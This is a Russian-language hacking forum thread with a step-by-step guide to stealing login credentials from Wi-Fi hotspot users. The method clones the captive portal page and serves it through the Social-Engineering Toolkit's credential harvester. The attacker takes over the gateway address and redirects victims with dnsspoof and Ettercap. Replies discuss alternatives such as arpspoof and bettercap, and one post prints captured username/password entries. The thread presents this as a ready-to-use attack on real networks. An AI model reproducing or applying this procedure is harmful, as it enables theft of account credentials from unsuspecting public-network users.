Взлом Хотспотов (Hotspot Hacking)

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by electric, 4 May 2017.

  1. electric

    electric Member

    Joined:
    28 Apr 2016
    Messages:
    16
    Likes Received:
    12
    Reputations:
    4
    Может кому-то будет интересна тема взлома хотспотов.
    Ломаю по методу с этого видео
    Написал инструкцию на русском, удалил не нужные действия, уже практически не заглядываю в неё при необходимости собрать новую порцию пар логин/паролей))
    Но скажу, прежде чем получилось взломать, проделал все описанное в видео раз 50...
    Если будут вопросы, задавайте, буду рад помочь.
    (актуально для моряков)

    1.Создаём в домашней директории папку "a".
    2.Сохраняем стартовую страницу хотспота как index.html в созданную папку.
    3.Набираем произвольный логин и пароль, жмем вход, как напишет что нет такого юзера, сохраняем страницу как post.html
    4.Заходим в свойства соединения, копируем адрес "default route" (маршрут по умолчанию),
    в свойствах IPv4 выставляем DHCP в ручной режим и прописываем в адрес и шлюз скопированный "default route", маску подсети 255.255.255.0
    5.Отключаемся от хотспота
    6.Открываем редактором Leafpad страницу index.html, делаем поиск по слову "md5", удаляем все содержимое начиная со <script> и заканчивая </script> включительно.
    7.Делаем поиск по слову "action" и меняем адрес помещённый в кавычки на "post.php", так делаем со всеми строками содержащими слово "action".
    8.Пункты 6 и 7 повторяем и для сохранённой страницы post.html
    9.Запускаем терминал, в командной строке набираем "setoolkit"
    10.Если спросит: "Do you want to enable bleeding-edge repos for fast updates" - отвечаем "no"
    11.На вопрос: "Do you agree to the terms of service" отвечаем "y" и попадаем в главное меню Social-Engineering Toolkit
    12.Далее по очереди: (1,2,3,3)
    set>1 (Social-Engineering Attacks)
    set>2 (Website Attack Vectors)
    set>:webattack>3 (Credential Harvester Attack Method)
    set>:webattack>3 (Custom Import)
    set>:webattack> IP address for the POST back in Harvester/Tabnabbing: (вставляем адрес "default route")
    set>:webattack> Path to the website to be cloned:/root/a/index.html (прописываем путь до index.html)
    set>:webattack> URL of the website you imported: (оставляем пустым)
    13.Перед тем как запустить apache, подключаемся к хотспот
    14.Отвечаем "y", запускается сервер Apache2
    15.Идем в созданную папку с сохраненными файлами, копируем все файлы.
    16.Заходим в директорию "var" -> "www" -> "html", удаляем файл "index.html" и вставляем наши скопированные файлы
    17.Открываем редактором файл "post.html", копируем все содержимое, закрываем файл.
    18.Открываем редактором файл "post.php" и после знака ">" в конце первой строки, с новой строки вставляем все скопированное содержимое предыдущего файла, сохраняемся.
    19.Открываем терминал, набираем в командной строке по очереди:
    chown -R www-data:www-data /var/www/html
    chown -R www-data:www-data /var/www/html/index_files
    chown -R www-data:www-data /var/www/html/post_files
    20.Открываем ещё один терминал, набираем "dnsspoof -i wlan1" (или wlan0, у кого один wifi-адаптер)
    21.Запускаем "Ettercap" -> Sniff -> Unified sniffing -> выбираем наш WiFi адаптер и ждём паролей, которые будут писаться в файл harvester_xxxx....)

    https://mega.nz/#!V1N1SYwT!N0GAuoHftIH8U2umfORN6sVN0Qr_0iz5XSnxeOr8024
     
    #1 electric, 4 May 2017
    Last edited: 5 May 2017
    Kolhozan, hunt.lsk, khamyk and 2 others like this.
  2. fury_makers

    fury_makers Member

    Joined:
    7 Mar 2013
    Messages:
    128
    Likes Received:
    20
    Reputations:
    0
    Здравствуйте, можете описать за счет чего происходит взлом? Как перехватываються логины и пароли внутри сети? Нужно ли чтобы клиент подключенный к т.д. был нам видим?
     
  3. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    c помощью dnsspoof и ettercap. Траффик заворачивается на вас. с фейковой страницей.
     
    4Fun and fury_makers like this.
  4. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,816
    Likes Received:
    18,489
    Reputations:
    377
    Инструкции не хватает вашей, раз уж видео не ваше.
     
    _________________________
    Alexmeh, Gorev and Triton_Mgn like this.
  5. electric

    electric Member

    Joined:
    28 Apr 2016
    Messages:
    16
    Likes Received:
    12
    Reputations:
    4
    я бы с удовольствием выгрузил свое видео, если бы была такая возможность, пока к сожелению её нет...
    ps. инструкцию прикрепил.
     
  6. khamyk

    khamyk Well-Known Member

    Joined:
    30 Dec 2013
    Messages:
    552
    Likes Received:
    337
    Reputations:
    0
    Ну постарайся при первой же возможности,народу будет интересно ;)
     
  7. electric

    electric Member

    Joined:
    28 Apr 2016
    Messages:
    16
    Likes Received:
    12
    Reputations:
    4
    Я думаю этот вопрос уместней было бы задать автору видео, но от себя скажу что в файл harvester пары логин/пароль пишутся только с назначением от гугл.ком
    Array
    (
    [dst] => https://www.google.com
    [popup] => true
    [username] => 2hb
    [password] => kw8
    )
    Array
    (
    [dst] => https://www.google.com
    [popup] => true
    [username] => eyx
    [password] => ev9
    )
    и т.д.
     
  8. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    Вам не кажется как то тупо он поменял свой АйПи на адрес шлюза?
    АРПСпуфф? Не не слышал...
    Мне кажется где то подъёбка... если не прав поправьте.
     
  9. electric

    electric Member

    Joined:
    28 Apr 2016
    Messages:
    16
    Likes Received:
    12
    Reputations:
    4
    главное что метод работает на 100%
    может продемонстрируете нам свой метод сбора логин/паролей в сети хотспот?

    как станем к причалу, обязательно выгружу, сейчас скорость не ахти, и срывы соединения
     
    #9 electric, 5 May 2017
    Last edited: 5 May 2017
    khamyk likes this.
  10. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
  11. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    Легко...

    apache2+setoolkit+arpsppof+dnsspoof
     
    Triton_Mgn likes this.
  12. electric

    electric Member

    Joined:
    28 Apr 2016
    Messages:
    16
    Likes Received:
    12
    Reputations:
    4
    а есть возможность сделать видео процесса, или хотябы иструкцию, я бы опробовал альернативу на реальных хотспотах?!
    думаю будет полезно для развития темы!
     
    #12 electric, 5 May 2017
    Last edited: 5 May 2017
  13. electric

    electric Member

    Joined:
    28 Apr 2016
    Messages:
    16
    Likes Received:
    12
    Reputations:
    4
    пока не успел проверить на местных спотах, да и поиском по "hotspot" её не заметил...
     
  14. khamyk

    khamyk Well-Known Member

    Joined:
    30 Dec 2013
    Messages:
    552
    Likes Received:
    337
    Reputations:
    0
    Ну попробуй и ты метод user100,я пробовал, ничего не получилось.Если авторизация простая (http POST),то проще всего запустить bettercap, результат 100% и сеть не сильно вешает.Форвардинг там лучше работает чем в etercap.А твой метод,я так понимаю,работает и с ssl авторизацией?
     
Loading...